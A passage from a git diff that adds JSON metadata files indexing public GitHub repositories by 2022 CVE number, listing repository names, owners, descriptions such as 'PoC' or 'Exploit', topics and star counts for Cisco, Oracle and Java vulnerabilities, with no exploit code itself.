"2023-03-06T12:50:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20818.json b/2022/CVE-2022-20818.json new file mode 100644 index 0000000000..22667f4667 --- /dev/null +++ b/2022/CVE-2022-20818.json @@ -0,0 +1,39 @@ +[ + { + "id": 742645854, + "name": "CVE-2022-20818", + "full_name": "mbadanoiu\/CVE-2022-20818", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-20818", + "description": "CVE-2022-20818: Local Privilege Escalation via Partial File Read in Cisco SD-WAN", + "fork": false, + "created_at": "2024-01-13T00:17:53Z", + "updated_at": "2024-01-13T10:19:51Z", + "pushed_at": "2024-01-13T00:42:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-20818", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20829.json b/2022/CVE-2022-20829.json new file mode 100644 index 0000000000..f6c3a290bf --- /dev/null +++ b/2022/CVE-2022-20829.json @@ -0,0 +1,40 @@ +[ + { + "id": 486681156, + "name": "theway", + "full_name": "jbaines-r7\/theway", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/theway", + "description": "A tool for extracting, modifying, and crafting ASDM binary packages (CVE-2022-20829)", + "fork": false, + "created_at": "2022-04-28T17:04:58Z", + "updated_at": "2024-07-18T05:16:56Z", + "pushed_at": "2022-08-15T19:03:07Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "asa", + "asdm", + "cisco", + "cve-2022-20829", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20866.json b/2022/CVE-2022-20866.json new file mode 100644 index 0000000000..331396af0d --- /dev/null +++ b/2022/CVE-2022-20866.json @@ -0,0 +1,33 @@ +[ + { + "id": 513519108, + "name": "CVE-2022-20866", + "full_name": "CiscoPSIRT\/CVE-2022-20866", + "owner": { + "login": "CiscoPSIRT", + "id": 15335164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15335164?v=4", + "html_url": "https:\/\/github.com\/CiscoPSIRT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CiscoPSIRT\/CVE-2022-20866", + "description": "RSA Key Checker for CVE-2022-20866", + "fork": false, + "created_at": "2022-07-13T12:48:49Z", + "updated_at": "2022-09-07T14:23:48Z", + "pushed_at": "2022-08-10T16:47:09Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2097.json b/2022/CVE-2022-2097.json new file mode 100644 index 0000000000..9a79a33883 --- /dev/null +++ b/2022/CVE-2022-2097.json @@ -0,0 +1,33 @@ +[ + { + "id": 511264690, + "name": "OpenSSLUpgrade1.1.1q-Ubuntu", + "full_name": "PeterThomasAwen\/OpenSSLUpgrade1.1.1q-Ubuntu", + "owner": { + "login": "PeterThomasAwen", + "id": 69471531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69471531?v=4", + "html_url": "https:\/\/github.com\/PeterThomasAwen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterThomasAwen\/OpenSSLUpgrade1.1.1q-Ubuntu", + "description": "A script to change OpenSSL versions on Ubuntu to 1.1.1q to protect against CVE-2022-2097.", + "fork": false, + "created_at": "2022-07-06T19:18:58Z", + "updated_at": "2024-04-16T20:23:15Z", + "pushed_at": "2022-07-06T19:20:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2109.json b/2022/CVE-2022-2109.json new file mode 100644 index 0000000000..57e7fe6b8c --- /dev/null +++ b/2022/CVE-2022-2109.json @@ -0,0 +1,33 @@ +[ + { + "id": 530633500, + "name": "oracle-weblogic-CVE-2021-2109", + "full_name": "Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "description": "Oracle Weblogic RCE - CVE-2022-2109", + "fork": false, + "created_at": "2022-08-30T11:50:17Z", + "updated_at": "2023-01-11T16:07:19Z", + "pushed_at": "2022-08-30T11:52:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21241.json b/2022/CVE-2022-21241.json new file mode 100644 index 0000000000..da94812e1d --- /dev/null +++ b/2022/CVE-2022-21241.json @@ -0,0 +1,38 @@ +[ + { + "id": 379108906, + "name": "csv-plus_vulnerability", + "full_name": "satoki\/csv-plus_vulnerability", + "owner": { + "login": "satoki", + "id": 54702093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54702093?v=4", + "html_url": "https:\/\/github.com\/satoki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satoki\/csv-plus_vulnerability", + "description": "👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)", + "fork": false, + "created_at": "2021-06-22T01:36:16Z", + "updated_at": "2024-08-12T20:14:09Z", + "pushed_at": "2022-02-11T13:59:14Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity", + "exploit", + "poc", + "security" + ], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21306.json b/2022/CVE-2022-21306.json new file mode 100644 index 0000000000..8a18ec6b30 --- /dev/null +++ b/2022/CVE-2022-21306.json @@ -0,0 +1,33 @@ +[ + { + "id": 624702558, + "name": "CVE-2022-21306", + "full_name": "hktalent\/CVE-2022-21306", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-21306", + "description": "POC,EXP,chatGPT for me,只能给一些思路,全部不可用", + "fork": false, + "created_at": "2023-04-07T03:59:07Z", + "updated_at": "2023-04-07T03:59:43Z", + "pushed_at": "2023-04-07T03:59:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21340.json b/2022/CVE-2022-21340.json new file mode 100644 index 0000000000..a7198a6ffc --- /dev/null +++ b/2022/CVE-2022-21340.json @@ -0,0 +1,41 @@ +[ + { + "id": 784177636, + "name": "CVE-2022-21340", + "full_name": "Alexandre-Bartel\/CVE-2022-21340", + "owner": { + "login": "Alexandre-Bartel", + "id": 655248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/655248?v=4", + "html_url": "https:\/\/github.com\/Alexandre-Bartel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexandre-Bartel\/CVE-2022-21340", + "description": "PoC for CVE-2022-21340", + "fork": false, + "created_at": "2024-04-09T10:41:12Z", + "updated_at": "2024-04-09T10:45:03Z", + "pushed_at": "2024-04-09T10:44:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "denial-of-service", + "dos", + "java", + "openjdk", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21350.json b/2022/CVE-2022-21350.json new file mode 100644 index 0000000000..c47ac96d67 --- /dev/null +++ b/2022/CVE-2022-21350.json @@ -0,0 +1,33 @@ +[ + { + "id": 542425330, + "name": "CVE-2022-21350", + "full_name": "hktalent\/CVE-2022-21350", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-21350", + "description": null, + "fork": false, + "created_at": "2022-09-28T05:38:15Z", + "updated_at": "2024-01-15T17:50:10Z", + "pushed_at": "2024-02-28T09:49:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21371.json b/2022/CVE-2022-21371.json new file mode 100644 index 0000000000..de492cc568 --- /dev/null +++ b/2022/CVE-2022-21371.json @@ -0,0 +1,111 @@ +[ + { + "id": 451918204, + "name": "CVE-2022-21371", + "full_name": "Mr-xn\/CVE-2022-21371", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-21371", + "description": "Oracle WebLogic Server 12.1.3.0.0 \/ 12.2.1.3.0 \/ 12.2.1.4.0 \/ 14.1.1.0.0 Local File Inclusion", + "fork": false, + "created_at": "2022-01-25T14:50:29Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2022-01-25T14:52:21Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 528880899, + "name": "Oracle-WebLogic-CVE-2022-21371", + "full_name": "Vulnmachines\/Oracle-WebLogic-CVE-2022-21371", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Oracle-WebLogic-CVE-2022-21371", + "description": "Oracle WebLogic CVE-2022-21371", + "fork": false, + "created_at": "2022-08-25T14:12:33Z", + "updated_at": "2024-08-12T20:26:29Z", + "pushed_at": "2022-08-31T19:59:45Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 810939629, + "name": "CVE-2022-21371", + "full_name": "Cappricio-Securities\/CVE-2022-21371", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-21371", + "description": "Oracle WebLogic Server (LFI)", + "fork": false, + "created_at": "2024-06-05T16:29:16Z", + "updated_at": "2024-06-24T10:35:46Z", + "pushed_at": "2024-06-24T10:35:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2022-21371", + "cve-2022-21371-poc", + "cve-2022-21371-scanner", + "lfi", + "lfi-detection", + "lfi-exploitation", + "lfi-exploiter", + "lfi-scanner", + "lfi-vulnerability", + "local-file-inclusion", + "oracle-weblogic-server", + "oracle-weblogic-server-lfi" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21392.json b/2022/CVE-2022-21392.json new file mode 100644 index 0000000000..f5be845916 --- /dev/null +++ b/2022/CVE-2022-21392.json @@ -0,0 +1,39 @@ +[ + { + "id": 729286928, + "name": "CVE-2022-21392", + "full_name": "mbadanoiu\/CVE-2022-21392", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-21392", + "description": "CVE-2022-21392: Local Privilege Escalation via NMR SUID in Oracle Enterprise Manager ", + "fork": false, + "created_at": "2023-12-08T20:13:23Z", + "updated_at": "2024-08-12T20:33:05Z", + "pushed_at": "2023-12-08T20:27:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-21392", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21445.json b/2022/CVE-2022-21445.json new file mode 100644 index 0000000000..c6a0929976 --- /dev/null +++ b/2022/CVE-2022-21445.json @@ -0,0 +1,64 @@ +[ + { + "id": 675524172, + "name": "CVE-2022-21445", + "full_name": "M0chae1\/CVE-2022-21445", + "owner": { + "login": "M0chae1", + "id": 91662499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91662499?v=4", + "html_url": "https:\/\/github.com\/M0chae1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0chae1\/CVE-2022-21445", + "description": "CVE-2022-21445", + "fork": false, + "created_at": "2023-08-07T05:59:13Z", + "updated_at": "2024-06-21T00:11:24Z", + "pushed_at": "2023-08-07T06:00:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 770745685, + "name": "CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "full_name": "hienkiet\/CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "owner": { + "login": "hienkiet", + "id": 63083901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63083901?v=4", + "html_url": "https:\/\/github.com\/hienkiet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hienkiet\/CVE-2022-21445-for-12.2.1.3.0-Weblogic", + "description": null, + "fork": false, + "created_at": "2024-03-12T04:47:02Z", + "updated_at": "2024-10-30T07:27:51Z", + "pushed_at": "2024-03-18T07:32:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21449.json b/2022/CVE-2022-21449.json new file mode 100644 index 0000000000..5a3fae8c8f --- /dev/null +++ b/2022/CVE-2022-21449.json @@ -0,0 +1,345 @@ +[ + { + "id": 483607069, + "name": "jfrog-CVE-2022-21449", + "full_name": "jfrog\/jfrog-CVE-2022-21449", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2022-21449", + "description": null, + "fork": false, + "created_at": "2022-04-20T10:23:07Z", + "updated_at": "2024-08-12T20:22:36Z", + "pushed_at": "2022-04-24T07:07:52Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 38, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 483632364, + "name": "CVE-2022-21449-vuln-test", + "full_name": "jmiettinen\/CVE-2022-21449-vuln-test", + "owner": { + "login": "jmiettinen", + "id": 724318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/724318?v=4", + "html_url": "https:\/\/github.com\/jmiettinen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jmiettinen\/CVE-2022-21449-vuln-test", + "description": "CVE-2022-21449 Vulnerability tester", + "fork": false, + "created_at": "2022-04-20T11:47:55Z", + "updated_at": "2022-04-22T13:27:00Z", + "pushed_at": "2022-04-20T11:48:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483804378, + "name": "CVE-2022-21449-TLS-PoC", + "full_name": "notkmhn\/CVE-2022-21449-TLS-PoC", + "owner": { + "login": "notkmhn", + "id": 7225227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7225227?v=4", + "html_url": "https:\/\/github.com\/notkmhn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notkmhn\/CVE-2022-21449-TLS-PoC", + "description": "CVE-2022-21449 Proof of Concept demonstrating its usage with a client running on a vulnerable Java version and a malicious TLS server", + "fork": false, + "created_at": "2022-04-20T20:31:15Z", + "updated_at": "2024-11-16T19:49:07Z", + "pushed_at": "2022-04-21T12:04:10Z", + "stargazers_count": 121, + "watchers_count": 121, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 121, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 484125564, + "name": "psychic-signatures", + "full_name": "marschall\/psychic-signatures", + "owner": { + "login": "marschall", + "id": 471021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/471021?v=4", + "html_url": "https:\/\/github.com\/marschall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/marschall\/psychic-signatures", + "description": "Demos the Psychic Signatures vulnerability (CVE-2022-21449)", + "fork": false, + "created_at": "2022-04-21T16:26:50Z", + "updated_at": "2022-04-21T16:27:12Z", + "pushed_at": "2022-04-21T16:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 485001744, + "name": "CVE-2022-21449", + "full_name": "thack1\/CVE-2022-21449", + "owner": { + "login": "thack1", + "id": 22935481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22935481?v=4", + "html_url": "https:\/\/github.com\/thack1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thack1\/CVE-2022-21449", + "description": "Zeek script to detect exploitation attempts of CVE-2022-21449 targeting TLS clients", + "fork": false, + "created_at": "2022-04-24T10:59:11Z", + "updated_at": "2022-04-27T09:28:36Z", + "pushed_at": "2022-05-01T15:16:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485439867, + "name": "SignChecker", + "full_name": "Damok82\/SignChecker", + "owner": { + "login": "Damok82", + "id": 11257965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11257965?v=4", + "html_url": "https:\/\/github.com\/Damok82", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Damok82\/SignChecker", + "description": "Test tool to demonstrate the vulnerability of CVE-2022-21449", + "fork": false, + "created_at": "2022-04-25T16:02:24Z", + "updated_at": "2022-04-25T16:35:44Z", + "pushed_at": "2022-04-25T16:27:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502711634, + "name": "CVE-2022-21449", + "full_name": "fundaergn\/CVE-2022-21449", + "owner": { + "login": "fundaergn", + "id": 46315661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46315661?v=4", + "html_url": "https:\/\/github.com\/fundaergn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fundaergn\/CVE-2022-21449", + "description": "CVE 2022-21449", + "fork": false, + "created_at": "2022-06-12T19:41:48Z", + "updated_at": "2022-06-12T19:41:48Z", + "pushed_at": "2022-06-12T19:42:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 519281774, + "name": "CVE-2022-21449-showcase", + "full_name": "Skipper7718\/CVE-2022-21449-showcase", + "owner": { + "login": "Skipper7718", + "id": 66838226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66838226?v=4", + "html_url": "https:\/\/github.com\/Skipper7718", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Skipper7718\/CVE-2022-21449-showcase", + "description": null, + "fork": false, + "created_at": "2022-07-29T16:33:10Z", + "updated_at": "2022-07-29T16:33:26Z", + "pushed_at": "2022-07-30T20:05:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530559822, + "name": "CVE-2022-21449", + "full_name": "davwwwx\/CVE-2022-21449", + "owner": { + "login": "davwwwx", + "id": 26136505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26136505?v=4", + "html_url": "https:\/\/github.com\/davwwwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davwwwx\/CVE-2022-21449", + "description": "repo showcasing generating \"psychic signatures for java\" implemented in a nodejs environment 😅", + "fork": false, + "created_at": "2022-08-30T08:12:24Z", + "updated_at": "2023-01-12T14:45:24Z", + "pushed_at": "2023-01-12T14:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21449" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 532526273, + "name": "CVE-2022-21449", + "full_name": "AlexanderZinoni\/CVE-2022-21449", + "owner": { + "login": "AlexanderZinoni", + "id": 93882101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93882101?v=4", + "html_url": "https:\/\/github.com\/AlexanderZinoni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlexanderZinoni\/CVE-2022-21449", + "description": null, + "fork": false, + "created_at": "2022-09-04T11:56:58Z", + "updated_at": "2023-11-03T15:22:18Z", + "pushed_at": "2024-03-19T17:28:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836527056, + "name": "AIS3-2024-Project-D5Team", + "full_name": "HeyMrSalt\/AIS3-2024-Project-D5Team", + "owner": { + "login": "HeyMrSalt", + "id": 173133346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173133346?v=4", + "html_url": "https:\/\/github.com\/HeyMrSalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HeyMrSalt\/AIS3-2024-Project-D5Team", + "description": "Reappear-CVE-2022-21449-TLS-PoC", + "fork": false, + "created_at": "2024-08-01T03:27:17Z", + "updated_at": "2024-10-17T21:19:59Z", + "pushed_at": "2024-10-17T21:19:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21500.json b/2022/CVE-2022-21500.json new file mode 100644 index 0000000000..281d36a6cf --- /dev/null +++ b/2022/CVE-2022-21500.json @@ -0,0 +1,40 @@ +[ + { + "id": 812484365, + "name": "CVE-2022-21500", + "full_name": "Cappricio-Securities\/CVE-2022-21500", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-21500", + "description": "Oracle E-Business Suite <=12.2 - Authentication Bypass", + "fork": false, + "created_at": "2024-06-09T02:59:45Z", + "updated_at": "2024-06-24T10:52:01Z", + "pushed_at": "2024-06-24T10:50:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-21500", + "ebs", + "oracle", + "pentesting", + "wpt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21587.json b/2022/CVE-2022-21587.json new file mode 100644 index 0000000000..7fd4e52908 --- /dev/null +++ b/2022/CVE-2022-21587.json @@ -0,0 +1,95 @@ +[ + { + "id": 597954094, + "name": "CVE-2022-21587-POC", + "full_name": "hieuminhnv\/CVE-2022-21587-POC", + "owner": { + "login": "hieuminhnv", + "id": 28292732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28292732?v=4", + "html_url": "https:\/\/github.com\/hieuminhnv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hieuminhnv\/CVE-2022-21587-POC", + "description": "CVE-2022-21587 POC ", + "fork": false, + "created_at": "2023-02-06T04:18:24Z", + "updated_at": "2023-05-06T15:24:03Z", + "pushed_at": "2023-02-17T09:22:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604991320, + "name": "Oracle-E-BS-CVE-2022-21587-Exploit", + "full_name": "rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit", + "description": "Oracle E-BS CVE-2022-21587 Exploit", + "fork": false, + "created_at": "2023-02-22T08:00:38Z", + "updated_at": "2024-09-23T09:01:19Z", + "pushed_at": "2023-02-14T03:46:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 